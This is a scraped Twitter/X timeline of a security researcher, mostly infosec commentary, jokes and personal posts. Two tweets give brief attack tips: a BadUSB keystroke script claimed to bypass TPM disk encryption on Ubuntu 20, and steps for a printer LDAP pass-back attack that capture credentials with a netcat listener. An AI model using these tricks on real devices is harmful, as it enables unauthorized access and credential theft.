Shadow0pz π
@Shadow0pz
Followers
7K
Following
6K
Media
4K
Statuses
16K
A.I. | Datacenters | Cybersecurity | Builder | Dogs | Fmr: CoreWeave, BishopFox, Westinghouse Nuke, Microsoft Red Badge DOING THINGZ @HYPERIONGRAY
In Your Sisters DM's
Joined May 2016
Proud to announce that I'm joining forces with @_hyp3ri0n, @gperera and @HyperionGray to impose real cost on threat actors and cybersecurity vendors who have failed this industry for FAR too long. Those who seek to harm national interests or Human Rights will suffer kinetic and
3
0
12
@robby_rumble Clean Water Act and IEPA would like to have a word with this man to the tune of $100K/day+ in fines and cleanup charges plus a rather long visit to Federal Prison.
6
57
6K
Next time someone brosplains how I shouldn't be at the Gym or working out twice a day I'm just gonna show em this picture of @miakhalifa and remind them that just bc people don't play pro sports doesn't mean they aren't an Athlete. Mia crushes it daily. That's a lifestyle choice.
20
9
502
Them: Are you sure we had a breach?. Me: Yes. I'm "sure". Them: How do you know for sure though?. Me:. Them:. Me:
11
74
515
Wanna access Ubuntu 20 but itβs Full Disk Encrypted with TPM?. No problem!. Grab a @flipper_zero or any BadUSB device/keyboard emulator and prepare to be unimpressed with my dev skills. π. Script: . DELAY 15ms.ENTER.REPEAT 10000. Credit: #redteam
7
99
412
Wanna freak out? Running Windows 10 and think it doesn't watch you?. Try this: powercfg /sleepstudy /duration 7. Enjoy learning about when you are present and absent from your machine and more. Also for DFIR this is a great quick triage for user presence etc.
10
68
319
Not sure who needs to hear this but:. At no point will your small arms ever be sufficient to stop the US government from anything. Ever. If they βcome for youβ as you say then you are DONE. πͺ¦ A ghost π». We have weapons that erase entire zip codes. Your AR-15 is a toy.
3K
28
288
I have questions. WTF IS THIS? WHY IS IT ON THE INTERNET? WHY IS IT OPEN TO VNC WITH NO AUTH!!!!! NO! NO NO NO NO NO.
19
84
244
Recruiter: So it says here that you've been a Data Privacy Officer for several years. I've been recruiting for a decade, I can't believe I haven't heard of you before. Me: Exactly. Recruiter:? What do you mean?. Me: If you'd heard of me I wouldn't be doing a very good job.
5
24
223
@6502_ftw Throw some aliases in there that all result in VI commands. Watch them die slowly.
6
7
210
FYI:. If you ever attend my trainings in person and you want to bring your kid (12 and under) I will 100% make room for them for free. If anyone complains they can have a refund and GTFO.
7
20
211
This is NOT MY RESEARCH: I'm just sharing intel, passed along to me by others so don't get all excited but. BIG NEWS IF VERIFIED:. The XZ vulnerability CVE-2024-3094 is NOT an AUTH BYPASS, it's an RCE. The hooked "RSA public_decrypt" verifies a signature on the server's
6
41
210
Folks. If I can't hide. You can't either. Stop playing with silly toys. The only way we end this is through behavior change and DEMAND & Regulation. I hope you are listening. This "utopian ideal" will crumble and you'll have signed away everything you are for a free account.
3
45
188
@_hyp3ri0n Add my personal favorites. βPentest Report.pdf you can vary the name so the year is added etc. use a big company name like βBank_of_America_Pentest_Q423_Final.pdf and embed a canarytoken in it. Also works:. Employees.xlsx.Payroll.pdf.Passwords.docx. Etc. #PROFIT.
3
1
195
@MrZackMorris says buy $WISH and get in early. So I did it a few days ago. Then I hear markets "Red" so I pop in to check my portfolio. No Red in my portfolio. No clouds in my stones either. Why?. BC I listen to @MrZackMorris and when it dips I buy more. #GetPaidOrGetPlayed.
5
13
192
@GenMhayden is back! Merry Christmas sir! Once more into the fray. May God bless you and keep you and yours safe. I wish you a speedy recovery. #FinallySomethingGoodHappened.
0
17
125
@iBiteiStrike @ren_tragger It's actually less. 2020 has 2,016 working hours. $30,240 before state and federal taxes and without any health insurance. The lowest livable wage is Kentucky at $43,000. Massachusetts it's $60,000.
9
31
142
Since it appears everyone is asleep at the SOC. @solarwinds now would be a great time to remove the malicious packages STILL being hosted on your site. Like NOW. UNACCEPTABLE. (β―Β°β‘Β°οΌβ―οΈ΅ β»ββ».
7
17
142
I want to add some context to the #IS00N leak. Itβs important to understand that China has VAST databases of correlated data on individuals. They can cross reference a MAC address and IP with a person and their associations, home address, friends, family, social credit score,
3
33
151
Iβm so over the cosplay bs. I have gear for emergencies and more medical supplies and life preserving gear than anything. I have firearms (enough to keep my family fed and hopefully safe) but at no point did βfight the worlds largest standing armyβ enter my mind. Like WTH? SMH.
178
2
136
@chrisculling @hacks4pancakes Look into constructive discharge or dismissal. They just broke federal law and in doing so they likely violated their contract clauses with whatever agency they are supporting. If they're this bold there's likely a lot more under that rug. Don't sign ANYTHING. Call a lawyer asap.
1
3
125
Today @EpsonAmerica decided to threaten my kid with this message when he tried to print his school assignment. "non-genuine ink is recorded". Keyword recorded immediately triggered his DAD!!!!! Response. The Magenta is 100% "Genuine" but let's see where it's recorded shall we?
5
30
119
Windows 11 is a dumpster fire. How does anyone use this garbage in any meaningful way?. Nothing works with it. SQL server Dev? Nope. VSCode? Nope. It canβt even open its own fkn start menu. No wonder everyone is buying Apple.
45
10
128
@natfriedman Allowing users who contribute to private repositories where the source cannot be shared to provide a brief description of the project or at least an indication of what it is/does. 99% of my work is private and commit activity means nothing to others.
4
0
121
@mshelton I've been in this space awhile and I think I can say unequivocally that there's not as many "Geniuses" in this space as Hollywood portrays. For reference, this is the SBI IQ scale. It only goes up to 162 points and is the "Gold Standard" of IQ tests. IQ = potential !talent
21
5
97
In a world full of hate, lies and corruption this gives me a glimmer of hope for humanity. Thanks to whomever finally got it done. Youβve done the community a great service and we appreciate you.
9
11
105
@shaunking Flip the image, level it so your mind isn't tricked by the perspective. Target the cab area and enhance a bit, and this is what we get. I'm going to run it through a couple of scrubbing scripts and see what comes out. Let's find this coward before he kills someone else.
2
9
90
@RAICESTEXAS @MarcusLuttrell Afghani family w SIV visas (Interpreter) is being deported @iah with his 7 family members Wife and young children. Visas are valid. Confusion on an envelope with meds records. Perhaps you could call a friend or two and ask them to look into it? #NeverQuit.
0
30
84
You said it couldn't be done. You called us liars and you doubled down. You threatened us and then you backed out of paying the bounties. So enjoy this little preview. And if you are a @Bitfi6 owner, just know that your coins were never safe, not even for a minute.
4
36
95
@hackermaderas I used to go to Goodwill, buy the HDD's recover the data, return it to the owner. Once found a 2TB external that was clicking. Took it apart, bumped the head. Recovered lost fam. photos going back 3gen. Sent a USB Drive in the mail with a note. He called me in tears. A good day.
3
12
86
Built a scanner for the #Cisco IOS XE WebShell detection. This INCLUDES the new IOCβs. Also adds the ability to customize your UserAgent, Scan a single IP or concurrently scan a list or CIDR. Logging and the ability to add custom IOCβs as well as proxying are all supported.
4
22
104
2
2
92
@Epson_Store I have Zero Tolerance for you recording any usage of anything on MY device. Is this data stored off of my printer? Associated with my Serial number or other identifier without my consent? Care to have your Data Privacy Officer give me a ring?.
2
4
79
Hey @ECCOUNCIL let me help you out here. 1. Delete the LinkedIn survey. 2. Fire your Social Media team. 3. Unblock the community leaders and others who were blocked for speaking out. 4. Issue a sincere apology. 5. Update your "dress code".6. Educate your org on DEI challenges.
2
19
88
Please stop calling Kaseya VSA a Supplychain Attack. All signs point to a SQLI 0-Day being abused in combination with a set of TTP's we've seen before. There was no magic. It was actively being patched. We need to talk about client segmentation and isolation in MSP/MSSP models.
9
19
87
@PiperBayard Can someone please send me a link to this app? I'm guessing it will take about 10 min to unravel it and then we'll just make sure EVERYONE is at every class. In fact, attendance will be at record highs. You may even find that students stay late. VERY late. Hotel California Late.
0
8
78
@IanColdwater He didnβt resign he βduckedπ¦ outββ¦. Iβll see myself out. When I retire Iβm deleting my LinkedIn account.
4
2
81
Don't sell your soul to Apple for a fused device. If you're an ios researcher in need of an ethical place to work where your work can help save lives. Plus tools and a team that can protect you while ensuring you get paid AND published. Just DM. P.S. we use @CorelliumHQ #NoFuses
Apple Sending Special iPhones to First Participants in Security Research Device Program by @julipuli
0
21
85
@NYPDIIU @troyhunt @Scott_Helme New category for @PwnieAwards "Best Law Enforcement Response to Security Incident" and the award goes to: @NYPDIIU for knowing the difference between research and criminal activity, and publicly distinguishing between the two without hesitation.
1
10
84
Them: What did they take?. Me: What's the most valuable thing you have data wise?. Them: Proprietary Sensitive blah blah. Me: They took that. Them: Are you sure?. Me: Let's just assume for a moment that I know what I am talking about and everything I say isn't a sales pitch.
1
3
76
So to the guy who admitted he has "very little technical knowledge" I would like to say the following:. You are the problem in this industry. I won't buy anything you or your organization sells. Your CISO and Chief People Officer will be getting a call from me today.
7
2
79
My wife just informed me that she wants to become a PenTest Engineer because she feels that her unique ability to communicate with others coupled with her technical & analytical skills will make her formidable. I'm both immensely proud of her and scared for the industry.
1
2
77
I'm seeing a lot of folks referring to WebKit etc. Please read my posts carefully. These apps were completely removed from the device. The device is pristine when these tests were run at each indiv. test. THE ONLY UNIQUE ID IS THE DEVICE HERE.
5
9
73
@lucasfryer Iβd have thrown hands. This is awful. WTH is he doing! Who is this poor cameraman about to be departed from his body by a .50cal at point blank range? Hard Pass.
2
0
77
@notdan No Kevin I don't work at <REDACTED>. I work at FOAAS. If you wish to contact my employer you can do so securely using this link:
3
4
70
That means they promoted an ad based on not just what I searched but also what they knew was "new" and possibly would result in a conversion for me. Now addiction is in that profile and I can't even have it corrected.
4
12
68
@JeffJacksonNC @JeffJacksonNC is there any truth to this bill encompassing not just TikTok but ANY app or site that the government deems a security threat? If so this sounds a lot more like censorship and I think thats why thereβs concern about it amongst your constituents.
8
3
61
Now that this is at 250k views its time to reveal this entire post/replies were created to expose algorithmic bias using a handful of keywords and a βcontroversial topicβ via a LLLM (think ChatGPT). Why?. Algorithmic Bias Research. Blog coming soon. Thx for the engagement!
96
6
69
When rescuing a hostage from a violent offender you don't engage the threat while the hostage is at risk unless the risk of death outweighs the risk to the hostage. You let the situation develop. Everyone drops their guard for a moment. It's your job to seize that. This Isn't It.
Man murders his girlfriend, steals her infant son. Cops say "challenge accepted!" and make sure to shoot the baby dead so no one can have him.
3
16
56
@Hac10101 Herwβs what I see. Mind you some of these may just be poor design choices or handled elsewhere but here:. Passwords likely stored as plaintext. MD5 used for hashing. The secret key is hardcoded. No user input sanitization. HS256 is used for JWT signing. No SSL/TLS
9
3
68
@RSAConference Using @IanColdwater infinidash based implementation of the Blockchain Secure Unified Clustering K8 Solutions protocol (aka: Blockchain S.U.C.K.S) resolves all this. Look it up baby.
6
5
62
She's a Data Privacy and Cybersecurity SME and has a rolodex of hundreds of CxO level executive contacts. She's directly responsible for over 2Bil in technology sales. Some "bro" just told her she wasn't "technical" bc she doesn't have a CISSP and they chose a male candidate.
3
7
62
Name 10 Cybercriminals or groups who made or used ransomware and took home more than $10mm in ransom who have been pursued, captured and brought to justice. I'll wait.
5
8
69
@cybergibbons I do a lot of firmware analysis and I use FAC. It's easy to extend and it uses common open source tools and an intuitive UI. Very slick and FREE!
2
16
68
My wife has a degree in Mathematics and another in Computer Science from a Tier 1 university. She has been a directional drilling engineer for Schlumberger. She helped create Connected Healthcare at Cisco. Multiple Cisco certifications and 20yrs C level sales/cons. Exp.
1
2
62
@CorelliumHQ helps us investigate human rights violations in Apple devices. They're one of two vendors in our history that we have EVER publicly supported. This fights important.
@runasand @washingtonpost Linking this older thread on how it all started. This was mainly about the βcopyright infringementβ case Corellium won in December 2020. But Apple is persistent.
0
28
65
This has @IanColdwater vibes all over it. It's a shame it doesn't say "Look it up baby". Sorry Ian I know you probably tire of the tags for every goose picture but I do try to restrain myself.
1
1
59
@zackwhittaker Hey @tuftsvet You wanna explain why you have so many Apple Remote Desktop Systems WIDE OPEN to the internet? I won't go into the rest of the shit show that is your publicly facing internet but I'd think REAL HARD about what you did here.
1
5
59
@IanColdwater I see you have discovered the same underlying problem I have. Nothing on this platform is truly private.
1
3
57
Why is this relevant to my account?.I do research on Asia and Human rights (hence Thailand). I searched Google for a controlled substance withdrawal symptoms (hence Rehab). I've repeatedly mentioned hurricanes recently (beachfront).
1
5
56
@j_opdenakker "We take the security and privacy of our customers seriously" - Every Breached Company Ever
0
8
62
This is an honest plea for some help. It's the hardest things I've ever had to write. It's brutally honest. I apologize in advance for the length. Please read it all the way through. I just published: PLEASE KILL YOUR IDOLS: IβM ASKING FOR YOUR HELP
7
35
57
@officialmcafee @naqvis_syed I'll be happy to meet you at any public event. You bring your bitfi, I'll bring mine. We can play a little game. You show your dashboard and send a single transaction. Punch in your salt and Passphrase. When you are done you hand me the device. If I take the coins I keep them.
2
7
59
The things we find on LinkedIn posts are amazing. Thanks for the picture of your badge and phone as well as the RSA hard token and laptop. It will make some physical pen testers day. Sorry about the RIF. @generalelectric #KnowTheRules #LanyardLife #Redacted
4
14
55
@TinkerSec @0xBDB Someone posted this the other day. Can't remember who (Sorry!). Find a printer. 1) Log into printer. 2) Look for LDAP configured. (There's your LDAP CFG).3) Point the destination to your PC. 4) netcat -l -vv -p 444.5) Initiate an LDAP query. 6) Wait for creds.
1
13
57
@mubix So when you say no code exec you mean no code exec on SERVER01 at all? As in you don't want to make ANY calls to the server or changes to it because you don't want the defender to see you? That's tough but there's a low level way to do this that might avoid detection. Depends on
1
4
57
Since When? @Apple ?. Why does my USB connected device require an open mic to play music or use Maps?. Privacy Violation Much?
7
9
53
@ppentestlabs This is what's about to happen. You started off by playing by the rules and responding (even when your practices are completely improper). Then came the right hook, you attempting to explain "secure" password storage and failing. The rest is going to be the ground and pound.
2
2
54
I have wandered the earth for 44yrs. Traveled to many foreign lands and spoken to religious and spiritual leaders of many different religions. I asked them one simple question. Buddha responded with the only coherent answer.
2
13
53
If you want to remain on the βfollowing listβ please speak up. Some of you I know personally will remain. If we talk regularly youβre likely good. Otherwise if != brand/organization or known entity = removed. Nothing personal I just gotta tighten up my circle for whats to come.
33
1
49
Here's your memory dump and your key/passphrase. That was easy. 3 people is NOT trust. @cybergibbons @Bitfi6
0
11
54
What happens next will be neither shocking nor unexpected for some. It should be disturbing for all.
1
8
47
@63red So Scott. Just curious. How's that GoFundMe working out? 50K goal for an app? 25 donations for total $750. I'm sure the users whose PII you left leaking are gonna have questions for your lawyers. You do have a lawyer right? 50 states 50 privacy laws. Notified the AG's yet?
2
1
43
Consider this:.1. Neither myself nor anyone I know is currently suffering from or seeking treatment for Oxycodone withdrawal. 2. I have medical debt like most Americans. 3. I have close family members with aspbergers. 2 & 3 were "knowns". 1 was not anything searched before.
1
7
46
@n0x00 @kfalconspb Ummmm if you believe that you qualify for this role please contact me immediately. I PROMISE you I can find you a better job and the very last thing we will call you is entry level.
0
2
47
6yr old: Dad! I broke my calculator!. Me: What happened to it?. 6yr old: It won't add my number together!. Me: Mom's the math major. Let her look at it. Mom: Let me see. Oh. Give it to your dad. That seems like something he is used to handling. <Laughing>. Me: π€¨π§ let me see
2
1
50
@trinertech As opposed to what? Turning away the parent for being a good parent who wants to learn something while exposing the child to other adults wishing to learn? . OMG! . The horror!. No Ticket!. Quick call the police!. Same person probably calls cops on lemonade stands w/o permits.
1
0
46
This seems. Bad.
A meteor fell into the most active volcano in Indonesia, Mount Merapi
5
4
50
In honor of the hard work my wife and friend has put into this industry for 20yrs and to support the power of diversity in InfoSec I am giving away 5 workshop seats to ANY WOMAN, POC, LGBTQ community member. Pls.Retweet for reach. @chadloder @aloria @find_evil @zackwhittaker.
5
51
47
@techspence In order to defend something you must first know what you are defending and why. Understand what makes that difficult from the inside and outside. Gain insight into the environment AND it's users challenges. Then assess it as an insider and as a threat. Document, Prioritize,.
4
1
51
@jsrailton @MalcolmNance Agree with @MalcolmNance although possible its the P320-M18 varient with the 17rnd magazine in Coyote given the proportions in the video. It's the Civilian model of the US Military and specifically the USMC "official sidearm".
0
4
40
For those new here. Every single βmajorβ company is going to lay off somewhere between 4% and 10% of their workforce in 2024. The βreasonβ is simple. They NEED to deflate wages and reduce operating expenses to keep their profit margins growing so the stock doesnβt crash.
3
10
45
@rsandler21969 @chris_herd I've been WFH since 2007. I have accomplished more for my family and employers in that time than ever. I've never been "passed over" and I've been able to use the extra time I would lose in transit to mentor others and care for my gifted children. So tell me how I'm selfish? π.
0
2
37